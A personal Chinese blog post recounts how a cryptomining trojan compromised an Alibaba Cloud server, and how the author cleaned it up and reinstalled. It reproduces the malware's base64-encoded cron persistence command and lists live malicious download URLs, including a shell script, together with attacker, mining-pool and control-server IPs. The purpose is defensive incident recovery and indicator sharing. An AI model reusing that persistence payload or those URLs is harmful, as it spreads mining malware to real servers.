个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施

以前玩过腾讯,阿里,华为的免费服务器,都是又卡又慢,身为22世纪祖国的花朵,经过知识付费的熏陶,我义无反顾的终止了我的白嫖行为,然而努力让自己变得更好的路上总是有各种坑。。。。

服务器背景:

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第1张图片

操作环境背景:

操作系统:Windows 10

操作工具:xshell(Free for Home/school)

故事背景:

拿到服务器后,自己创建了一个普通用户:shaun ;密码:123456   

(我承认我懒,所以设了这个连号密码,但这个该死的挖矿程序把我心态搞炸了,他要是不搞我的程序,让我还能玩,我都懒得搞他,但是我搭建的程序都GG了,所以不得不花费一天时间来记录一下,菜鸡的垂死挣扎全过程)

一个多月都是用普通用户在瞎捣鼓,有一天习惯的ssh登录,然而不幸的事情发生了,一直登陆不上。(后来证明还有Apache Solr Velocity模板注入问题)

(当时没截图,以下图片都是后来的)

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第2张图片

解决方法:

根据菜鸡生存手册第一条:百度一下,你就知道。

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第3张图片

虽然没解决但是提供了点思路,使用root成功登陆服务器,

发现些许猫腻

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第4张图片

 

甜蜜的!这台服务器上什么都没有运行,跑这些干啥玩意捏,经过简单的kill 命令,发现杀不完。

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第5张图片

看了一下定时任务果然:(当时没截图,以下图片都是后来的)

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第6张图片

 

定时任务的脚本:

/bin/sh -c echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5MjI2ID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL2hvbWUvc2hhdW4vYnZ4Y3Z3ID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第7张图片

while 循环!这是每一个小时不留痕迹的循环搞事情呀。。。

 

此时已经知道中了挖矿木马病毒,甜蜜的,这种级别的已经不是我这种菜鸡可以解决的了,登录阿里云官网看了一下,

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第8张图片

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第9张图片

因为穷所以没有快照,有钱的小伙伴一定要搞个快照,但是也要小心,别把病毒也快照进去了。

最偷懒的解决发法:重装系统(想要根除病毒太难了,初始化一下就完事了),无非就是数据的问题,不怕直接重装;

阿里云官方教程:https://help.aliyun.com/document_detail/25449.html

初始化30分钟都不到;重新安装java,mysql,应用程序,恢复数据等,最重要的是重新设置了超复杂密码,以上问题解决一共花费清明节三天时间,反正受疫情影响,也出不去,只能这样安慰自己。

 

shaun:挖矿木马程序,你没想到吧,解决你只要几分钟,格式化一下就好了

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第10张图片

 

以上全部内容,此致敬礼! (大佬们看到这里就可以了,这也是官方推荐的解决方法,下面的是菜鸡的左右互搏苦苦挣扎。)

 

 

 

再一天后,又是习惯的ssh登录,还是原来的配方,还是熟悉的味道,加夕。。。。(跑题了)

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第11张图片

解决方法:

根据菜鸡生存手册第一条:百度一下,你京

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第12张图片

挖矿木马:你没想到吧,我又回来了!

shaun:我去年买了个表!

人生不如意,十有八九。本以为逃过一劫,

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第13张图片

好吧,这辈子劳碌的命。。。

1.root登录

2.查看指定用户是否有定时任务:

crontab -l -u shaun

3.删除此用户的定时任务:

crontab -r -u  shaun

4.查看此用户的定时任务文件:

cd /var/spool/cron/

5.通过 ll  找到 shaun的定时任务文件,直接 rm -rf shaun

6.因为神秘力量,所以会不停的创建shaun 的定时任务,你删了,过会又出来了。所以此时我们要走病毒的路,让他无路可走。

    根据Linux下一切都是文件,一个目录归根到底还是一个文件,所以同一目录内文件和目录不能同名!

    个人操作:所以创建一个目录 名为shaun,让他没有办法创建名为shaun的定时任务文件。

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第14张图片

7.在次查看指定用户是否有定时任务:

crontab -l -u shaun

 

8.在来一套七伤拳打发,检测cron定时服务是否自启用:

systemctl is-enabled crond.service

 结果展示如下:

 enable表示已启用自启动
 disable标识未启用自启动

 

9.如果已经启用,关闭cron自启动:

systemctl disable crond.service

 

10.停止cron服务[命令没有提示]:

systemctl stop crond.service

 

11.查看cron服务的启动状态:

systemctl status crond.service

[只有cron的状态是active  running的,才表示cron服务是启动的]

 

12.至此定时任务,应该停止了。可以查看一下有哪些正在运行的进程,kill掉不正常的就OK了。

ps -ef |grep shaun

 

13.修改 shaun 用户的登录密码

passwd shaun

 

14.重新试了一下shaun 登录,可以登陆了。灰常开心,终于不要初始化了。

 

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第15张图片

应该找售后解决问题,我不能抢人家饭碗呀。

 

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第16张图片

 

总结:养成备份的好习惯,最好使用快照备份,就是注意别把病毒也备份进去。

          像我一样如果就是想玩玩,可以自己先和病毒玩玩,自认为技术过关,病毒查杀干干净净了,可以不用初始化。

                  如果和我一样是小白那最后还是初始化(格式化),此方法最麻烦的就是如何恢复数据了。

 

在此感谢这三个网站提供的思路:

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第17张图片

https://www.w3xue.com/exp/article/20199/53730.html

https://zhuanlan.zhihu.com/p/85731835

https://www.cnblogs.com/hack404/p/11464890.html

 

 

 

Tips:要想生活过得去,所有检查都得绿。

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第18张图片

 

 

 

 1.贴出恶意下载源(我已经把这个ip,不论入站还是出站都拒绝访问了)

      (千万别点,会自动下载一个东东到你的电脑,我没研究):http://82.146.36.205/sites/default/files/maps   

     个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第19张图片

 

2.贴出矿池IP:157.245.228.211 ;矿池端口:80

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第20张图片

 

3.web攻击, Apache Solr Velocity模板远程命令执行漏洞

请求时间:2020-04-07 18:07:26

攻击者IP:194.99.104.130

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施_第21张图片

 

暂时修改建议:​ 限制互联网用户对solr admin的访问!

 

 

其他 恶意IP很多,不管是不是肉鸡,我是宁错杀不放过。

高危链接:本人在此声明,仅供学习参考,有任何问题,与本文,本人无关。

http://35.168.165.151/sites/default/files/maps

http://82.146.36.205/sites/default/files/maps

攻击者IP:194.99.104.130

矿池IP:157.245.228.211

矿池IP:157.245.149.66

中控IP:134.209.81.199

中控IP:157.245.149.66

攻击者IP:212.8.247.179

URL链接:http://217.12.221.244/s.sh

 

最后结束语:

与天斗,与地斗,与人斗,其乐无穷!

 

 

你可能感兴趣的:(生命的意义,Linux)